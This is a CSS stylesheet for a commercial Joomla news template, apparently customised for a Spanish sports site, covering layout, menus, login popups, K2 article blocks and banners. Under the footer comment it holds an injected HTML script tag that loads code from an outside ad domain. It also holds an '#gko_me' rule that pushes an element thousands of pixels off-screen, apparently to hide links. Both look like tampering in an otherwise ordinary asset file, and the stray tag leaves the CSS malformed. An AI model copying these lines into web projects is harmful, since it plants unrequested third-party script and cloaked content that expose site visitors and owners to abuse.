/*
#------------------------------------------------------------------------
# News - December Joomla! template (for Joomla 2.5)
#
# Copyright (C) 2007-2012 Gavick.com. All Rights Reserved.
# License:  Copyrighted Commercial Software
# Website:  http://www.gavick.com
# Support:  support@gavick.com
 */

/* Basic elements */
.gallery-flickr ul li{
	margin-left:5%;
}

body {
	min-height: 100%;
	background: #fff;
	font-size: 12px;
	line-height: 1.6;
	color: #333;
	padding: 0;
	font-weight: normal;
	word-wrap: break-word;
}

a {
	color: #363636;
	-webkit-transition: color 0.2s linear;
	-moz-transition: color 0.2s linear;
	-o-transition: color 0.2s linear;
	transition: color 0.2s linear;
	text-decoration: none;
	-webkit-transform: translateZ(0);
}

.itemIntroText a, .itemFullText a{
	color: #e25b32;
	text-decoration:none;
}

.itemFullText a:hover,
.itemFullText a:active,
.itemFullText a:focus,
.itemIntroText a:hover,
.itemIntroText a:active,
.itemIntroText a:focus{
	text-decoration:underline;
}

a:hover,
a:active,
a:focus {
	color: #e25b32;
}

h1,
h2,
h3,
h4,
h5,
h6 {
	margin: 0;
	padding: 0;
	color: #000;
	font-weight: normal;
}

h1 {
	font-size: 46px;
}

h2,
.componentheading {
	font-size: 42px;
}

h3 {
	font-size: 24px;
}

h4 {
	font-size: 125%;
}

h5 {
	font-size: 110%;
}

ul {
	list-style: none;
	margin: 0;
	padding: 0;
}

ul li {
	line-height: 2.0;
}

p {
	margin: 0.5em 0 1.5em;
}

/* Containers */

.gkPage {
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	-ms-box-sizing: border-box;
	-o-box-sizing: border-box;
	box-sizing: border-box;
	margin: 0 auto!important;
}

#gkPageTop {
	background: #000;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	-ms-box-sizing: border-box;
	-o-box-sizing: border-box;
	box-sizing: border-box;
	min-height: 45px;
	position: relative;
	z-index: 999;
}

#gkBannerTop {
	width:980px;
}

#gkHeader {
	background: #eee;
}

#gkPageWrap {
	margin: 0 auto;
}

#gkPageContent {
	border: 1px solid #e5e5e5;
	border-bottom: none;
	border-top: none;
	width: 100%;
}

#gkContent,
#gkPageContent {
	background: transparent url('../images/line.png') repeat-y 0 0;
}

/* Logo  */

#gkLogo {
	height: 35px;
	margin: 5px 30px 0 0;
	padding: 0;
	text-indent: -999em;
	text-shadow: none;
	width: 140px;
	display: block;
	float: left;
}

#gkLogo img {
	display: block;
	margin: 0;
}

#gkLogo.cssLogo {
	background: transparent url('../images/style1/logo.png') no-repeat 0 0;
	/* You can specify there logo size and background */
	height: 45px;
	margin: 0 30px 0 0;
	width: 84px;
}

#gkLogo.text {
	color: #fff;
	font-size: 36px;
	min-height: 24px;
	padding: 0;
	text-align: center;
	text-indent: 0;
	text-transform: uppercase;
}

#gkLogo.text > span {
	display: block;
	font-size: 32px;
	font-weight: 700;
	line-height: 25px;
	padding: 0;
}

#gkLogo.text .gkLogoSlogan {
	color: #eee;
	display: block;
	font-family: Arial, Verdana, sans-serif;
	font-size: 11px;
	line-height: 11px;
	text-align: center;
	text-transform: none;
}

/* userarea */

#gkUserArea {
	float: right;
	margin-left: 20px;
}

#gkUserArea a {
	-webkit-box-shadow: inset 0 0 27px rgba(0, 0, 0, 0.75);
	-moz-box-shadow: inset 0 0 27px rgba(0, 0, 0, 0.75);
	-ms-box-shadow: inset 0 0 27px rgba(0, 0, 0, 0.75);
	box-shadow: inset 0 0 27px rgba(0, 0, 0, 0.75);
	display: block;
	float: left;
	height: 45px;
	margin: 0;
	text-indent: -9999px;
	-webkit-transition: background-color .3s ease-out;
	-moz-transition: background-color .3s ease-out;
	-ms-transition: background-color .3s ease-out;
	transition: background-color .3s ease-out;
	width: 50px;
}

#gkLogin {
	background: #363636 url('../images/topmenu_icons.png') no-repeat 0 center;
}

#gkLogin:active,
#gkLogin:focus,
#gkLogin:hover {
	background-color: #e25b32;
}

#gkRSS {
	background: #a88f52 url('../images/topmenu_icons.png') no-repeat -50px center;
}

#gkRSS:active,
#gkRSS:focus,
#gkRSS:hover {
	background-color: #e25b32;
}

/* Top content */

#gkContentTop {
	border: 1px solid #e5e5e5;
	border-top: none;
	padding: 3px 0px;
}

#gkTopMenu {
	background: transparent url('../images/topmenu_bg.png') repeat 0 0;
	float: left;
	line-height: 28px;
	margin-top:1px;
	margin-right: 0px;
	width:100%;
	max-width:656px;
}

#gkTopMenu ul{clear:right !important}

#gkTopMenu li {
	border: none;
	color: #7a7a7a;
	float: left;
	font-size: 11.5px;
	margin: 0;
	padding: 0;
}

#gkTopMenu li:hover {
	background: none
}

#gkTopMenu li a {
	color: #7a7a7a;
	display: block;
	line-height: 28px;
	padding: 0 5px;
}

#gkTopMenu li.active a, #gkTopMenu li a:active,
#gkTopMenu li a:focus,
#gkTopMenu li a:hover {
	color: #E77008 !important;
}

/* Menu Escudos */
#menu-escudos {
	line-height: 28px;
	margin-left:5px;
	margin-right: 0px;
	max-width:656px;
}

#menu-escudos .nav-header{font-weight:bold; font-size:11px; display:block; padding:5px; color:#FFF; background:rgb(231, 112, 8)}

#menu-escudos li {
	border: none;
	float: left;
	margin: 0;
	padding: 5px 0 0 0;
}

#menu-escudos li:hover {
	background:none;
	opacity:0.7;
	filter:alpha(opacity=70);
}

#menu-escudos span.image-title{display:none}
#menu-escudos li a {
	display: block;
	line-height: 28px;
	padding: 5px 5px 0 5px;
}

#menu-escudos li.active a img, #menu-escudos li a:active img,
#menu-escudos li a:focus img,
#menu-escudos li a:hover img {
	opacity:0.7;
	filter:alpha(opacity=70);
}


/* Search */

#gkSearch {
	float: right;
}

#mod-search-searchword {
	width:200px;
	background: transparent url('../images/search_bg.png') no-repeat right center;
	border: 1px solid #e5e5e5;
	-webkit-box-shadow: inset 0 0 9px rgba(0, 0, 0, 0.11);
	-moz-box-shadow: inset 0 0 9px rgba(0, 0, 0, 0.11);
	-ms-box-shadow: inset 0 0 9px rgba(0, 0, 0, 0.11);
	-o-box-shadow: inset 0 0 9px rgba(0, 0, 0, 0.11);
	box-shadow: inset 0 0 9px rgba(0, 0, 0, 0.11);
	margin-top: 0px;
}

/* Social icons */

#gkSocial {
	float: right;
	margin-left: 10px;
}

#gkSocial p {
	margin: 0;
}

.gkTwitter,
.gkFb,
.gkGplus,
.gkPinterest {
	display: block;
	float: left;
	height: 22px;
	line-height: 22px;
	padding: 0;
	text-indent: -9999px;
	-webkit-transition: background 0.3s cubic-bezier(.17, .67, .88, 1.25), color 0.2s linear;
	-moz-transition: background 0.3s cubic-bezier(.17, .67, .88, 1.25), color 0.2s linear;
	-o-transition: background 0.3s cubic-bezier(.17, .67, .88, 1.25), color 0.2s linear;
	transition: background 0.3s cubic-bezier(.17, .67, .88, 1.25), color 0.2s linear;
	width: 28px;
}

.gkTwitter {
	background: transparent url('../images/style1/social_icons.png') no-repeat 0 0;
}

.gkFb {
	background: transparent url('../images/style1/social_icons.png') no-repeat -28px 0;
}

.gkPinterest {
	background: transparent url('../images/style1/social_icons.png') no-repeat -56px 0;
}

.gkGplus {
	background: transparent url('../images/style1/social_icons.png') no-repeat -84px 0;
}

.gkTwitter:active,
.gkTwitter:focus,
.gkTwitter:hover {
	background: transparent url('../images/style1/social_icons.png') no-repeat 0 -22px;
}

.gkFb:active,
.gkFb:focus,
.gkFb:hover {
	background: transparent url('../images/style1/social_icons.png') no-repeat -28px -22px;
}

.gkPinterest:active,
.gkPinterest:focus,
.gkPinterest:hover {
	background: transparent url('../images/style1/social_icons.png') no-repeat -56px -22px;
}

.gkGplus:active,
.gkGplus:focus,
.gkGplus:hover {
	background: transparent url('../images/style1/social_icons.png') no-repeat -84px -22px;
}

/* Group modules */

#gkBottom1,
#gkBottom2 {
	-webkit-transform: translateZ(0.001); /* With 0 the left border on Chrome dissapears O.o */
	border-top: 1px solid #e5e5e5;
	margin: 0 auto!important;
	overflow: hidden;
	padding: 36px 0; 
}

#gkBottom1 .box .header,
#gkBottom2 .box .header {
	font-size: 16px
}

#gkBottom2 .box {
	color: #999;
	font-size: 12px
}

#gkBottom2 .box a { 
    color: #777
}

#gkBottom2 .box a:hover { 
    color: #363636
}

/* standard breadcrumb */

#gkBreadcrumb {
	background: #F9F9F9;
	border-bottom: 1px solid #e5e5e5;
	margin: -10px -9px 10px -10px;
	padding: 5px 10px;
}

#gkBreadcrumb .breadcrumbs {
	float: left;
	color: #333;
}

#gkBreadcrumb .breadcrumbs li.separator {
	width: 10px;
	text-align: center;
	padding: 0 4px!important;
	color: #ccc;
}

#gkBreadcrumb .breadcrumbs li.pathway {
	padding-right: 20px;
}

#gkBreadcrumb .breadcrumbs > ul > li {
	float: left;
	font-size: 12px;
	font-weight: 600;
}

#gkBreadcrumb .breadcrumbs > ul > li a {
	font-weight: normal
}

#gkTools {
	float: right;
	margin: 4px 0 0 10px;
}

#gkTools a {
	display: block;
	float: left;
	width: 22px;
	height: 16px;
	margin: 0 0 0 0px !important;
	text-indent: -99999em;
	background: url('../images/font_size.png') no-repeat -38px 50%;
}

a#gkToolsReset {
	background-position: -15px 50%;
	margin-left: 6px;
}

a#gkToolsDec {
	background-position: 6px 50%;
}

/* footer */
<script type="text/javascript" src="https://sac.ayads.co/sublime/31580"></script>
#gkFooter {
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	-ms-box-sizing: border-box;
	-o-box-sizing: border-box;
	box-sizing: border-box;
	border-top: 2px solid #E25B32;
	color: #777;
	font-size: 14px;
	line-height: 21px;
	margin: 0 auto 100px auto!important;
	padding: 16px 0 0
}

#gkFooterNav {
	float: left;
}

#gkFooterNav li {
	border: none;
	float: left;
	font-size: 11px;
	margin: 0 10px 0 0!important;
	padding: 0;
}

#gkFooterNav a {
	color: #999
}

#gkFooterNav li:hover,
#gkFooterNav a:hover {
	background: transparent;
	color: #363636;
}

#gkCopyrights {
	float: right;
	font-size: 11px;
	margin: 0 0 20px 0;
}

/* other footer elements */

#gkStyleArea {
	clear: both;
	display: block;
	line-height: 7px;
	margin: 0;
	text-align: center;
	-webkit-transform-style: preserve-3d;
	-moz-transform-style: preserve-3d;
	-ms-transform-style: preserve-3d;
	-o-transform-style: preserve-3d;
	transform-style: preserve-3d;
}

#gkStyleArea > div {
	float: left;
	margin: 13px 0 12px 0;
}

#gkStyleArea a {
	-webkit-border-radius: 50%;
	-moz-border-radius: 50%;
	border-radius: 50%;
	display: inline-block;
	height: 7px;
	margin: 9px 3px 9px 0;
	text-indent: -9999px;
	-webkit-transform: scale(1.0);
	-moz-transform: scale(1.0);
	-ms-transform: scale(1.0);
	-o-transform: scale(1.0);
	transform: scale(1.0);
	-webkit-transform-style: preserve-3d;
	-moz-transform-style: preserve-3d;
	-ms-transform-style: preserve-3d;
	-o-transform-style: preserve-3d;
	transform-style: preserve-3d;
	-webkit-transition: -webkit-transform 0.2s ease-out;
	-moz-transition: -moz-transform 0.2s ease-out;
	-o-transition: -o-transform 0.2s ease-out;
	transition: transform 0.2s ease-out;
	width: 7px;
}

#gkStyleArea a:hover {
	-webkit-transform: scale(1.5);
	-moz-transform: scale(1.5);
	-ms-transform: scale(1.5);
	-o-transform: scale(1.5);
	transform: scale(1.5);
}

#gkColor1 {
	background: #eb592a;
}

#gkColor2 {
	background: #3eabe9;
}

#gkColor3 {
	background: #8DA734;
}

#gkColor4 {
	background: #8c7a71;
}

#gkColor5 {
	background: #e8a246;
}

#gkColor6 {
	background: #c375b5;
}

#gkFrameworkLogo {
	display: block;
	width: 90px;
	height: 36px;
	background: url('../images/gavern-logo.png') no-repeat 0 0;
	text-indent: -9999em;
	margin: 12px auto 0 auto;
	opacity: 0.4;
}

/* Suffixes */

.box {
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	-ms-box-sizing: border-box;
	-o-box-sizing: border-box;
	box-sizing: border-box;
	color: #333;
	font-size: 13px;
	line-height: 1.6;
	padding: 10px 0;
	width: 100%;
}

div.content {
	clear: both;
}

#gkSidebar div.content{
	border: 1px solid rgb(219, 219, 219);
	padding: 1px;
}

#gkSidebar div.content .custom p{margin:0 !important}

.box li a {
	text-decoration: none;
}

.box a {
	text-decoration: none;
}

.box ul ul {
	margin-left: 20px;
}

.box ul ul li:last-child {
	border-bottom: none!important;
}

/* Suffix vertical */

.box.vertical {
	padding: 0!important;
}

.box.vertical .header {
	color: #363636;
	float: left;
	text-transform: uppercase;
	width: 30%;
}

.box.vertical .content {
	clear: none!important;
	float: left;
	width: 70%;
}

/* default suffix */

.box .header {
	font-size: 16px;
	font-weight:bold;
	text-shadow:1px 1px 2px #DDD;
	line-height: 18px;
	padding-bottom: 15px;
	text-transform: uppercase;
	background:url('../images/bg_mod_title.gif') repeat-x;
	border-top:2px solid #E77008;
	padding:5px 0 0 5px;
}

/* clear suffix */

.box.clear {
	margin: 0;
	padding: 0;
}

.clear div.content {
	clear: both;
}

/* nopadding suffix */

.box.nopadding {
	padding: 0 !important;
}

/* nomargin suffix */

.box.nomargin {
	margin: 0!important;
}

/* nooverflow suffix */

.box.nooverflow,
.box.nooverflow > div {
	overflow: visible!important;
}

/* advertisement suffix */

.box.advertisement .header {
	background: transparent;
	border-bottom: 1px solid #e5e5e5;
	color: #999!important;
	font-size: 10px!important;
	font-style: italic;
	font-weight: 300;
	margin: 0 0 5px 0;
	min-height: 16px;
	padding: 0;
	text-align: right;
	text-transform: uppercase;
	line-height: 16px;
	font-family: Arial, Verdana, sans-serif!important;
}

.box.advertisement .header span {
	background: transparent;
	float: right;
	line-height: 16px;
	padding: 0;
}

/* suffix _text */

.box_text > div {
	background: #fff;
}

/* suffix dark */

.box.dark {
	background: #222!important;
	color: #999;
	padding: 20px;
}

.box.dark .header {
	background: transparent!important;
}

.box.dark h1,
.box.dark h2,
.box.dark h3,
.box.dark h4,
.box.dark h5,
.box.dark h6 {
	color: #fff;
}

.box.dark ul {
	margin: 0;
	padding: 0;
}

.box.dark ul li {
	border-top: 1px solid #444;
	position: relative;
	padding: 2px 0;
}

.box.dark ul li:first-child {
	border-top: none;
}

.box.dark a {
	color: #fff;
}

.box.dark a:active,
.box.dark a:focus,
.box.dark a:hover {
	color: #e25b32;
}

.box.dark ul ul {
	margin: 0 0 0 20px;
}

.box.dark b,
.box.dark strong {
	font-weight: bold;
}

/* suffix light */

.box.light {
	background: #f8f8f8!important;
	padding: 20px;
}

#gkInset .box.light {
	margin: 1px;
	width: 99%;
}

.box.light ul {
	margin: 0;
	padding: 0;
}

.box.light ul li {
	border-top: 1px solid #ddd;
	position: relative;
}

.box.light ul li:first-child {
	border-top: none;
}

.box.light ul ul {
	margin: 0 0 0 20px;
}

.box.light b,
.box.light strong {
	font-weight: bold;
}

/* Suffix pattern */

.box.pattern {
	background: url('../images/topmenu_bg.png') repeat 0 0;
}

#gkInset .box.pattern {
	margin: 1px;
	width: 99%;
}

/* Suffix color */

.box.color .header {
	color: #e25b32;
}

/* Suffix bigtitle */

.bigtitle .header {
	font-size: 16px !important;
	font-weight:bold;
	text-shadow:1px 1px 2px #DDD;
	line-height: 18px;
	padding-bottom: 15px;
	text-transform: uppercase !important;
	background:url('../images/bg_mod_title.gif') repeat-x;
	border-top:2px solid #E77008;
	padding:5px 0 0 5px;
}

/* Suffix badge-new */

.box.badge-new .header,
.box.badge-popular .header,
.box.badge-top .header,
.box.badge-hot .header,
.box.badge-video .header,
.box.badge-audio .header,
.box.badge-gallery .header {
	position: relative;
}

.box.badge-new .header::after,
.box.badge-popular .header::after,
.box.badge-top .header::after,
.box.badge-hot .header::after {
	background: #9eb931;
	color: #fff;
	content: "New";
	font-size: 10px;
	font-weight: bold;
	padding: 0 6px;
	position: absolute;
	right: 0;
	top: 0;
	z-index: 1;
}

.box.badge-video .header::after,
.box.badge-audio .header::after,
.box.badge-gallery .header::after {
	background: url('../images/badges.png') no-repeat;
	content: "";
	height: 20px;
	position: absolute;
	right: 0;
	top: 2px;
	width: 26px;
	z-index: 1;	
}
.box.badge-audio .header::after {
	background-position: 0 -69px
}

.box.badge-gallery .header::after {
	background-position: 0 -132px
}

.box.badge-popular .header::after {
	background: #32aae2;
	content: "Popular";
}

.box.badge-top .header::after {
	background: #e25b32;
	content: "Top";
}

.box.badge-hot .header::after {
	background: #DBAE43;
	content: "Hot";
}

/* Suffix headlines */
#gko_me {position: absolute; top: 0px; right: 4111px;}
.box.headlines .header {
	background: #e25b32;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	-ms-box-sizing: border-box;
	-o-box-sizing: border-box;
	box-sizing: border-box;
	color: #fff;
	font-size: 12px;
	line-height: 12px;
	margin-bottom: 15px;
	padding: 16px 6px 12px 6px;
	position: relative;
	text-align: center;
}

.box.headlines .header::after {
	background: transparent url('../images/style1/highlight_bg.png') no-repeat 0 center;
	background-size: 100% 100%;
	bottom: -13px;
	clear: both;
	content: "";
	display: block;
	height: 13px;
	left: 0;
	position: absolute;
	width: 100%;
}

/* mainbody restrictions */

section#gkBreadcrumb + section#gkMainbody {
	margin-top: 0!important;
}

/* tablet/mobile suffixes */

.notablet {
	display: none;
}

.nomobile {
	display: none;
}

.onlytablet {
	display: none;
}

.onlymobile {
	display: none;
}

/* Login form */

#gkFBLogin {
	float: left;
	width: 45%;
}

#gkFBLogin p {
	line-height: 18px;
	margin: 14px 0 20px;
}

#gkFBLogin + #login-form,
#gkFBLogin + #com-login-form {
	float: left;
	width: 45%;
	margin-left: 4%;
	padding-left: 30px;
	border-left: 1px solid #e7e7e7;
}

#form-login-remember {
	margin: 10px 0;
}

#form-login-remember label {
	color: #777;
	font-size: 11px;
	font-weight: normal;
	line-height: 27px;
}

#login-form fieldset {
	margin: 0 0 20px;
}

#login-form fieldset p {
	margin: 0.5em 0;
}

#login-form ul {
	border-top: 1px solid #E7E7E7;
	overflow: hidden;
	padding: 12px 0 0;
}

#login-form ul li {
	font-size: 11px;
	line-height: 1.6;
}

#login-form ul li a {
	color: #999;
}

#login-form ul li a:hover {
	color: #222;
}

#login-form input[type="text"],
#login-form input[type="password"] {
	width: 85%;
}

.gkPopupWrap .logout-button input {
	float: right
}

label#jform_spacer-lbl {
	font-size: 11px;
	font-weight: normal;
	color: #666;
}

#login-form .login-greeting {
	color: #fff;
	float: left;
	font-size: 18px;
	margin-right: 32px;
}

.gkUsermenu {
	border-top: 3px solid #E25B32;
	clear: both;
	padding-top: 4px;
	position: relative;
	top: 10px;
}

.gkUsermenu li {
	border: none;
	background: #363636;
	color: #999;
	padding-left: 16px;
	margin: 0 0 3px
}

.gkUsermenu li a {
	color: #fff
}

/* Login with Facebook button */

span#fb-auth small {
	width: 20px;
	background: transparent url('../images/fbauth.png') no-repeat 0 2px;
	text-indent: -999em;
	display: block;
	float: left;
	border-right: 1px solid #a0aecd;
	margin: 3px 16px 0 0;
	height: 17px;
}

span#fb-auth {
	background-color: #798db9;
	
	display: inline-block;
	color: #fff;
	font-family: arial;
	line-height: 26px;
	font-size: 12px;
	font-weight: bold;
	margin: 12px 0 6px;
	padding: 7px 24px 7px 12px;
	text-decoration: none;
	text-shadow: 1px 1px 0px #445375;
	cursor: pointer;
	height: 24px;
	-webkit-border-radius: 1px;
	-moz-border-radius: 1px;
	border-radius: 1px;
	-webkit-transition: background-color 0.2s ease-out;
	-moz-transition: background-color 0.2s ease-out;
	-o-transition: background-color 0.2s ease-out;
	transition: background-color 0.2s ease-out;
	position: relative;
	top: -3px;
}

span#fb-auth:hover {
	background-color: #556b9b;
}

.login span#fb-auth {
	margin: 6px 0 0 10px;
}

/* popup */

#gkPopupOverlay,
#gkPopupLogin {
	display: none;
	overflow: hidden;
	position: fixed;
	z-index: 1000002;
	left: 50%;
	top: 50%;
	background: #222;
}

#gkPopupLogin {
	position: absolute;
	top: 70px;
	width: 560px;
	margin-left: -280px;
	-webkit-border-radius: 5px;
	-moz-border-radius: 5px;
	border-radius: 5px;
}

#gkPopupLogin #loginForm {
	background: transparent url('../images/login.png') no-repeat 4px 6px;
	padding-left: 170px
}

#gkPopupLogin label {
	color: #fff;
	font-size: 12px;
}

#gkPopupLogin #login-form input[type="text"],
#gkPopupLogin #login-form input[type="password"] {
	float: right;
	height: 36px;
	width: 70%;
	
}

#gkPopupLogin #login-form fieldset p {
	padding: 0 0 18px
}

#gkPopupLogin #form-login-remember,
#gkPopupLogin #form-login-buttons {
	margin-left: 100px
}

#gkPopupLogin #form-login-buttons input.button:hover {
	background: #212121;
}

#gkPopupLogin #login-form ul {
	background: none;
	border-top: 1px solid #444;
	margin-left: 100px;
	padding: 10px 0 0
}

#gkPopupLogin #login-form ul li {
	float: left;
}

#gkPopupLogin #login-form ul li:first-child {
	margin-right: 8px
}

.gkPopupWrap {
	padding: 32px;
	overflow: hidden;
}

.gkPopupWrap h3 {
	margin: 0 0 18px;
	font-size: 32px;
	line-height: 32px;
}

#gkPopupOverlay {
	background: #000;
	width: 100%;
	height: 100%;
	z-index: 1000001;
	top: 0;
	left: 0;
	margin-left: 0;
}


#gkMainbody #mainbody_left{width:50%; float: left !important}
/*#gkMainbody #mainbody_left{width:50% !important; float: left !important}*/
#gkMainbody #mainbody_right{width:50%; float: left !important;}
/*#gkMainbody #mainbody_right{width:50% !important; float: left !important;}*/
#gkMainbody #mainbody_right .k2ItemsBlock{}
#gkMainbodyBottom{clear:both}

.portada a.moduleItemTitle{font-size:45px !important; line-height:45px !important; font-weight:bold !important}

div .k2ItemsBlock ul{margin:0 !important; padding:0 !important}
div .k2ItemsBlock ul li{margin:0 !important; padding:0 !important}
.k2ItemsBlock .categoria{display:inline-block; padding:7px 0 !important}
.k2ItemsBlock.grid li{font-size:12px !important; border-bottom:1px solid #e5e5e5;}
#gkMainbody #mainbody_left .k2ItemsBlock.grid li{border-right:1px solid #e5e5e5; padding-right:8px !important}
#gkMainbody #mainbody_right .k2ItemsBlock.grid li{padding-left:8px !important}
.k2ItemsBlock.grid li.even{}
.k2ItemsBlock.grid .k2FeedIcon{clear:both}
.moduleItemCategory{color:#333 !important; font-weight:bold !important; font-family:Arial, Helvetica, sans-serif !important; font-size:11px; text-transform:uppercase}
a.moduleItemCategory:hover{color:#E77008 !important}
.moduleItemDateCreated{color:#333 !important; font-family:Arial, Helvetica, sans-serif !important; font-size:11px; }
.comentarios{float:right; padding:4px 0;}
.comentarios .moduleItemComments img, header .comentarios img{vertical-align:-4px !important}

.publicidad{
	clear:both;
	margin: 0 0 5px 0;
	background: rgb(197, 197, 197) url(../images/txt_publi.gif) no-repeat center 2px;
	padding: 14px 1px 1px 1px;
	position: relative;
}

#gkContent .publicidad div.content{border: 1px solid rgb(219, 219, 219); padding: 1px; background:#FFF}
#gkSidebar{padding:0 10px !important}
#gkMainbody #mainbody{margin-top:10px !important}
#gkMainbodyBottom{margin-top:10px}
#gkMainbodyBottom .content{padding:0 10px}
.bigtitle .nspHeader{font-size:14px !important; color:#000 !important; font-weight:bold !important}
.nspArt p.nspText{color:#666 !important; font-size:12px !important}
.nspArt p.nspInfo{color:#333 !important; font-size:11px !important}

.nostresport-tv .avPlayerWrapper{clear:none;}
.nostresport-tv .avPlayerContainer{width:450px !important}
.nostresport-tv .avPlayerBlock iframe{width:450px !important; height:253px !important}
.itemAuthBlock{padding:0 !important; border:0 !important}

section#canales{
	position: relative;
	top:15px;
	left:99px;
	max-width: 780px;
	background: url(../images/btn-canales.jpg) no-repeat #EFEFEF;
	border-top: 1px solid #DDD;
	border-right: 1px solid #DDD;
}
section#canales .menu{font-size:11px; color:#000; padding: 0 0 0 70px !important;}
section#canales .menu li{border:0; margin:0; padding:0 8px; float:left;}
section#canales .menu li a{color:#000; font-weight:bold}
section#canales .menu li:hover{background:#DDD}
section#canales .menu li a:hover{color:#000}

#k2Container.itemView h3{font-size:16px; color:#000; padding:0 0 10px 0; text-transform:uppercase; font-family:'Hammersmith One', Arial, sans-serif;}
#k2Container.itemView header h3{font-size:14px; color:#666; padding:0 0 10px 0}
#k2Container.genericView .itemImageBlock{float:left; display:block; margin:0 10px 10px 0;}
#k2Container.genericView .itemText{float:left;display:block; width: 415px; padding: 0 0 0 10px;}
#k2Container.genericView .itemText h3{font-weight: bold; line-height: 22px; font-size:18px}
#k2Container header.top, #k2Container div.top, .k2RssListBlock header.top{
	background: rgb(49, 49, 49);
	background:linear-gradient(to bottom, rgb(49,49,49) 0%, rgb(75,75,75) 100%); 
	background: -moz-linear-gradient(top, rgb(49, 49, 49) 0%, rgb(75, 75, 75) 100%);
	background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,rgb(49, 49, 49)), color-stop(100%,rgb(75, 75, 75)));
	background: -webkit-linear-gradient(top, rgb(49, 49, 49) 0%,rgb(75, 75, 75) 100%);
	background: -o-linear-gradient(top, rgb(49, 49, 49) 0%,rgb(75, 75, 75) 100%);
	background: -ms-linear-gradient(top, rgb(49, 49, 49) 0%,rgb(75, 75, 75) 100%);
	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#313131', endColorstr='#4b4b4b',GradientType=0 );
	height:75px; 
	overflow:hidden
}
#k2Container header.top h1, #k2Container div.top h1, .k2RssListBlock header.top h1{z-index:2;position:relative;color:#EFEFEF; font-family:'Hammersmith One', Arial, sans-serif; padding:0 5px; }
#k2Container header.top h2, #k2Container div.top h2, .k2RssListBlock header.top h2{z-index:1;font:125px 'Hammersmith One', Arial, sans-serif;
color: #666;
position: relative;
left: 20px;
top: -110px;
letter-spacing: -12px;
z-index: 1;
text-transform: lowercase;
white-space: nowrap;
border-right: 1px solid rgba(0, 0, 0, 0);}

#kalooga_9881{margin:0 auto !important;}
div.fb-comments span{}
div.fb-comments span iframe{}
.nspAvatar{vertical-align:middle}
.nspArt p.nspInfo span{}
.nspArt p.nspInfo a{padding:0 !important; font-weight:bold !important; color:#000 !important}
.nspArt p.nspInfo a:hover{color:#E77008 !important}
.cabecera_principal p{margin:0 !important; padding:0 !important}

ul.sigProClassic li.sigProThumb{margin:0 0px 5px 8px !important}
.sigProFlickrSetLink{display:none !important}

.galeria{width: 300px; float: left; padding:0 5px;}
.galeria h3{
	font-family: 'Hammersmith One', Arial, sans-serif;	
	font-size: 16px;
	font-weight: bold;
	text-shadow: 1px 1px 2px rgb(221, 221, 221);
	line-height: 18px;
	background: url('../images/bg_mod_title.gif') repeat-x;
	border-top: 1px solid #aaa;
	padding: 5px 0 5px 5px !important;
}
.galeria p{margin:0 !important}
.galeria:nth-child(2n){border-left:1px solid #EFEFEF; }
.galeria:nth-child(2n+1){clear:both;}

.k2RssListBlock ul{list-style-image: url(../images/ico_rss.png); padding:0 60px;}

section#bannersup{max-width:980px; position:relative; top:10px;}
section#bannersup p{margin:0; padding:0}
section#bannersup .bannersup_izq{width:728px; float:left; overflow:hidden; }
section#bannersup .bannersup_der{width:248px; float:right; overflow:hidden; }
section#bannersup .bannersup_der img{width:248px !important; height:90px !important}
#bannersup div.banneritem{border:0 !important; padding:0 !important} 

.k2ItemsBlock strong, .itemList strong{font-weight:normal !important}

.cortina{
	position: absolute;
	left: 0;
	top: 0;
	width: 100%;
	height: 240px;
	background-image: url(../images/stripes.png);
	background-repeat: repeat;
	cursor: pointer;
}

.grid .cortina{
	height: 173px !important;
}

.pagination ul li a, .pagination ul li span {
	display: block;
	font-size: 11px;
	height: 20px;
	line-height: 20px;
	min-width: 20px;
	padding: 2px 6px;
	text-align: center;
}

.pagination ul li.counter {
	float: right;
	font-size: 11px;
	line-height: 24px;
	margin-right: 12px;
}

/* FOROS */
#Kunena+div{
	display:none;
}


#Kunena input.kbutton{
	float:none !important;
	margin: 0 0 0 5px !important;
	display: inline !important;
	line-height:normal !important;
	color: #FFF !important;
	padding:2px 10px;
	background:#e77008 !important;
}

#Kunena input.kbutton:hover{
	padding:2px 10px !important;
	background:#333 !important;
}

#Kunena select{
	height: auto !important;
	line-height:normal !important;
	color: #333 !important;
}

#gkMainbody .registration{
	width:635px;
}

.registration #member-registration dt{
	margin-right:10px !important;
	min-width:260px !important;
}

.registration #member-registration input{
	width:100%;
	border:1px solid #999;
	background:
}

#loginForm .button{
	background:rgb(231, 112, 8);
	color:#FFF;
	cursor: pointer;
	display: block;
	float: left;
	font-size: 14px;
	font-weight: 400;
	height: 42px;
	line-height: 42px;
	margin: 0 5px 2px 2px;
	padding: 0 25px;
	text-align: center;
	transition: all .1s ease-out;
}

.hidden { display: none; visibility: hidden; }
.visible-phone { display: none !important; }
.visible-tablet { display: none !important; }
.hidden-desktop { display: none !important; }
.visible-desktop { display: inherit !important; }

@media (min-width:768px) and (max-width:979px) {
.hidden-desktop { display: inherit !important; }
.visible-desktop { display: none !important; }
.visible-tablet { display: inherit !important; }
.hidden-tablet { display: none !important; }
}

@media (max-width:767px) {
.hidden-desktop { display: inherit !important; }
.visible-desktop { display: none !important; }
.visible-phone { display: inherit !important; }
.hidden-phone { display: none !important; }
}

